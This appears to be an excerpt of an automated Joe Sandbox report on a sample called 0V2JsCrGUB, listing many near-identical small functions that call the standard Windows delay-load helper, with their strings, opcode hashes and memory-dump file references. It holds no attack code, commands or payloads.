Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun5
API String ID: 1269201914-2665998087
Opcode ID: 41291d0b264be3916ec0f70ea803aa797fad29455170bcb5dc2c07cd1b723840
Instruction ID: ebe90c45c881a0a1e6558510f218b96ff44debd49f0f53f622a9c8a9bd165483
Opcode Fuzzy Hash: 41291d0b264be3916ec0f70ea803aa797fad29455170bcb5dc2c07cd1b723840
Instruction Fuzzy Hash: 46B012C52682007C314F61549C03C37015CC1C3F12334962FFC18C5490F8405E482831

Function 0035E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E580

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

Fjun5, xrefs: 0035E57A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun5
API String ID: 1269201914-2665998087
Opcode ID: 9b410dd2fcc3924420f681ffa7667244e4ef75819b5885b3e827e131b719683a
Instruction ID: b59c1c6e5abad4ce9a2ba6252bf8e015ee39ea290e2543af333d7ad702afce7f
Opcode Fuzzy Hash: 9b410dd2fcc3924420f681ffa7667244e4ef75819b5885b3e827e131b719683a
Instruction Fuzzy Hash: 85B012C53681007C310F61549D03C37015CC1C3F12334962FFC18C5490FC405F092831

Function 0035E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E580

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

Fjun5, xrefs: 0035E57A, 0035E593

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun5
API String ID: 1269201914-2665998087
Opcode ID: 8fb938236a44fc50ff9471c9146c76308f7ed508426c08a7a1b6df1de31796c0
Instruction ID: caff30c2799fd441fcfbba152508d4abbb617bf3207dbd5cef1d7f8b3e6d956a
Opcode Fuzzy Hash: 8fb938236a44fc50ff9471c9146c76308f7ed508426c08a7a1b6df1de31796c0
Instruction Fuzzy Hash: CBB012C52681007D310F61545C02C37014CD1C2F12330942FFC18C5490F8445E082531

Function 0035E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: a595f0a5e85ac3b5af35a406fa16ec2765807cf933170c5e5a9fc01f6c9274b7
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: a595f0a5e85ac3b5af35a406fa16ec2765807cf933170c5e5a9fc01f6c9274b7
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 3ba3667ad9c3d12e6d26813858967d1a1b0f1f9d7c7711e0fba5c1b59af14688
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: 3ba3667ad9c3d12e6d26813858967d1a1b0f1f9d7c7711e0fba5c1b59af14688
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 488859216a3fc9d1ced1dfd98a58ddeed54b5be35a05c7e71123c0302a130896
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: 488859216a3fc9d1ced1dfd98a58ddeed54b5be35a05c7e71123c0302a130896
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 9c54057276d873cfdf29516704e189addd1443a46cd5e6e96bef4c7f857f7dc9
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: 9c54057276d873cfdf29516704e189addd1443a46cd5e6e96bef4c7f857f7dc9
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 0746df49fa0964ed4d5acef8ced23eeba0209893cdb1c2eca784ea5cfdf64e28
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: 0746df49fa0964ed4d5acef8ced23eeba0209893cdb1c2eca784ea5cfdf64e28
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 98952fd35bb49419bcd2236f0aad89cc79b408f259d6fb97a15f9b0556af724b
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: 98952fd35bb49419bcd2236f0aad89cc79b408f259d6fb97a15f9b0556af724b
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: c2f62d35887a32d04f5dbd127d3a1b6b933e650085c92e4ee89b02860cd97d21
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: c2f62d35887a32d04f5dbd127d3a1b6b933e650085c92e4ee89b02860cd97d21
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: c9f67cb3314e2378e07cc1342877686bc431494813eb46b2715e256dbd12002a
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: c9f67cb3314e2378e07cc1342877686bc431494813eb46b2715e256dbd12002a
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 92ccbe934f405f757f380ec60d3e9ff44c029d0383e868c27d2681c54e68eced
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: 92ccbe934f405f757f380ec60d3e9ff44c029d0383e868c27d2681c54e68eced
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 4b4faee74dcbaae756020d6b544c89cecf87eebeb506bea4ebf0a00fb3a4a654
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: 4b4faee74dcbaae756020d6b544c89cecf87eebeb506bea4ebf0a00fb3a4a654
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E1E3

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

5, xrefs: 0035E1DD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 5
API String ID: 1269201914-3411284777
Opcode ID: 8caf3121cae2c3d2b0279f08c7e8eeae25a2e4bcdf5ed894c0f644358cac145f
Instruction ID: c4969bfebeb12bd9aeb28dbb2dd4dc47abe8ae7d7c24e77a6acdf8b2abf13f19
Opcode Fuzzy Hash: 8caf3121cae2c3d2b0279f08c7e8eeae25a2e4bcdf5ed894c0f644358cac145f
Instruction Fuzzy Hash: D0A002D5169541BC311E51529E06C77011DC5C5F62331952EFC16C849158556A491475

Function 0035E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E580

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

Fjun5, xrefs: 0035E57A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun5
API String ID: 1269201914-2665998087
Opcode ID: 014c82cb91ea5df0294db430771c8734f2e4bb82babd5018ade55c13fad5bd30
Instruction ID: 99e4f08be3ea3d8ffe4087a8e283a16082c1a40b4581848bda5a83c2c37e5056
Opcode Fuzzy Hash: 014c82cb91ea5df0294db430771c8734f2e4bb82babd5018ade55c13fad5bd30
Instruction Fuzzy Hash: 07A011C22A82003C300E22A0AC02C3B020CC0C2F23330AA2EFC28888A0B8802A082830

Function 0035E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E51F

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

PDu<5, xrefs: 0035E519

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<5
API String ID: 1269201914-1466653219
Opcode ID: a10cbb31d627dad02385dd2bded63d924e54f80574f4c142342fbb3b78ff29e0
Instruction ID: a6c842058f22155eea15c295e8f5d3554972e6f50f639103f8706144953d2008
Opcode Fuzzy Hash: a10cbb31d627dad02385dd2bded63d924e54f80574f4c142342fbb3b78ff29e0
Instruction Fuzzy Hash: 52A011EA2A8082BC300E2220AC02C3B020CC0C2F22330A82EFC2A888A0B8800E080830

Function 0035E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E51F

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

PDu<5, xrefs: 0035E519

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<5
API String ID: 1269201914-1466653219
